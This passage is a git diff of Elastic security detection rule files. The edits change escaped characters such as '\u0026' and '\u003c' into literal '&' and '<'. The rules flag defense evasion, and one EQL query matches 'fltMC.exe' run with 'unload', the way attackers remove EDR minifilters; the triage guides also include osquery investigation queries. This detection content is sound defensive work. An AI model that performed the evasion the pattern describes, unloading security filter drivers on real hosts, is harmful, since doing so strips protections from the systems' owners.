b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_4.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_5.json b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_5.json index 1e155615374..a45aefeccdf 100644 --- a/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_5.json +++ b/packages/security_detection_engine/kibana/security_rule/06a7a03c-c735-47a6-a313-51c354aef6c3_5.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_104.json b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_104.json index 2061ea99e3d..12146ad735f 100644 --- a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "06dceabf-adca-48af-ac79-ffdf4c3b1e9a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_105.json b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_105.json index af0d378bc72..ca49e74b356 100644 --- a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Evasion via Filter Manager", - "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"fltMC.exe\" and process.args : \"unload\"\n", "related_integrations": [ { @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_106.json b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_106.json index 3dca64ec2c6..cbfa318dbff 100644 --- a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Evasion via Filter Manager", - "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"fltMC.exe\" and process.args : \"unload\"\n", "related_integrations": [ { @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_107.json b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_107.json index bd6632229d4..8149f628b16 100644 --- a/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/06dceabf-adca-48af-ac79-ffdf4c3b1e9a_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Evasion via Filter Manager", - "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Evasion via Filter Manager\n\nA file system filter driver, or minifilter, is a specialized type of filter driver designed to intercept and modify I/O requests sent to a file system or another filter driver. Minifilters are used by a wide range of security software, including EDR, antivirus, backup agents, encryption products, etc.\n\nAttackers may try to unload minifilters to avoid protections such as malware detection, file system monitoring, and behavior-based detections.\n\nThis rule identifies the attempt to unload a minifilter using the `fltmc.exe` command-line utility, a tool used to manage and query the filter drivers loaded on Windows systems.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line event to identify the target driver.\n - Identify the minifilter's role in the environment and if it is security-related. Microsoft provides a [list](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes) of allocated altitudes that may provide more context, such as the manufacturer.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for the action.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"fltMC.exe\" and process.args : \"unload\"\n", "related_integrations": [ { @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_104.json b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_104.json index 31d7a482d00..cffaa1262b0 100644 --- a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_104.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "074464f9-f30d-4029-8c03-0ed237fffec7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_105.json b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_105.json index d88d0a0bd8a..f58cf4ab936 100644 --- a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_105.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "074464f9-f30d-4029-8c03-0ed237fffec7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_106.json b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_106.json index 2a737a5cc02..f8e27d76c06 100644 --- a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_106.json +++ b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_106.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "074464f9-f30d-4029-8c03-0ed237fffec7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and 